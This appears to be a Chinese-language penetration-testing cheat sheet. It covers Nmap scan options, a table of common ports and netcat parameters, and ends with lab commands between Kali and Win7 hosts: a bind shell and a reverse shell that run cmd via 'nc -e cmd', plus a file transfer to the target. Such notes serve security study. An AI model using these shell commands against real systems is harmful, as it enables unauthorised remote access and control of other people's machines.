Nmap常见参数
参数 | 作用 | 常用场景 |
---|---|---|
-sn | 只探测存活主机,不进行端口扫描,适用于快速存活主机发现。 | 发现网络中存活的主机。 |
-Pn(推荐) | 只探测端口,不考虑主机是否存活,适用于绕过防火墙的探测。 | 绕过防火墙,直接进行端口扫描。 |
-O | 进行操作系统探测,尝试猜测目标主机的操作系统类型。 | 获取目标主机的操作系统信息。 |
-sS(推荐) | TCP SYN 扫描,对指定端口进行 SYN 扫描,常用于隐蔽性扫描。 | 隐蔽性扫描,不完全连接目标主机。 |
-p | 指定扫描的端口范围,如单个端口、端口列表或范围。所有端口:80,8080 -p- 80-8080 | 对指定端口或一段端口范围进行扫描。 |
-sV | 探测服务版本,获取目标主机的开放端口的服务版本信息。 | 获取开放端口的服务及其版本。 |
-A | 综合扫描,包括存活主机、操作系统、服务版本等信息。 | 获得目标主机的综合信息,用于全面的渗透测试。 |
-iL | 指定文件中的 IP 地址列表作为扫描目标。 | 批量扫描多个目标主机。 |
--exclude | 排除指定的 IP 地址,不对其进行扫描。 | 避免扫描指定的 IP 地址。 |
--excludefile | 指定文件中的 IP 地址列表,排除列表中的主机。 | 批量排除多个主机,专注于其他目标。 |
--script=vuln | 运行漏洞扫描脚本,探测目标主机的常见漏洞。 | 发现目标主机的漏洞并进行评估。 |
-T4 | 设置扫描速度为中等,可根据网络条件调整。 | 在速度和准确性之间取得平衡。 |
-v | 显示详细输出信息,包括每个扫描步骤的状态和结果。 | 获取更详细的扫描信息。 |
-oN | 将扫描结果保存到指定文件中,格式为正常文本。 | 保存扫描结果以供后续分析。 |
-oX | 将扫描结果保存到指定文件中,格式为 XML。 | 保存扫描结果以供进一步处理。 |
-oG | 将扫描结果保存到指定文件中,格式为 grepable。 | 保存扫描结果,用于 grep 命令过滤。 |
--reason | 显示扫描结果中每个端口状态的原因。 | 理解扫描结果中端口状态的来源。 |
--top-ports | 指定进行扫描的前 N 个最常见端口。 | 针对常见端口进行快速扫描。 |
扫描例子:nmap -p- -A -sS 192.168.11.100
常见端口
端口号 | 端口说明 |
---|---|
21 | ftp |
22 | ssh |
23 | telnet |
80 | http |
443 | https |
139 | samba |
3306 | mysql |
3389 | RDP远程桌面 |
NC食用常见参数
参数 | 作用 |
---|---|
-l | 监听模式,用于在服务器端侦听连接 |
-p <port> | 指定端口号 |
-s <source> | 指定源 IP 地址 |
-v | 显示详细输出信息 |
-z | 扫描监听主机上的端口,但不发送数据 |
-u | 使用 UDP 协议 |
-e <command> | 执行命令 |
-k | 持续监听模式,使服务器保持在后台运行 |
-q <seconds> | 设置超时时间 |
-n | 不进行 DNS 解析 |
-w <timeout> | 设置连接超时时间 |
-c | 使用无连接模式 |
-i | 立即连接模式 |
-o <file> | 指定输出文件 |
kali 输入ip:建立正向连接
kali:nc 192.168.11.100 4444
win7:nc64.exe -lvvp 4444 -e cmd
_________________________________________________________________________
目标主机输入ip:建立反向连接kali: nc -lvvp 4444
win7: nc 192.168.11.101 4444 - e cmd
kali往目标主机传文件
kali主机:nc -lvvp 4444 < ip.txt -q 1
目标主机:nc64.exe 192.168.11.101 4444>111.txt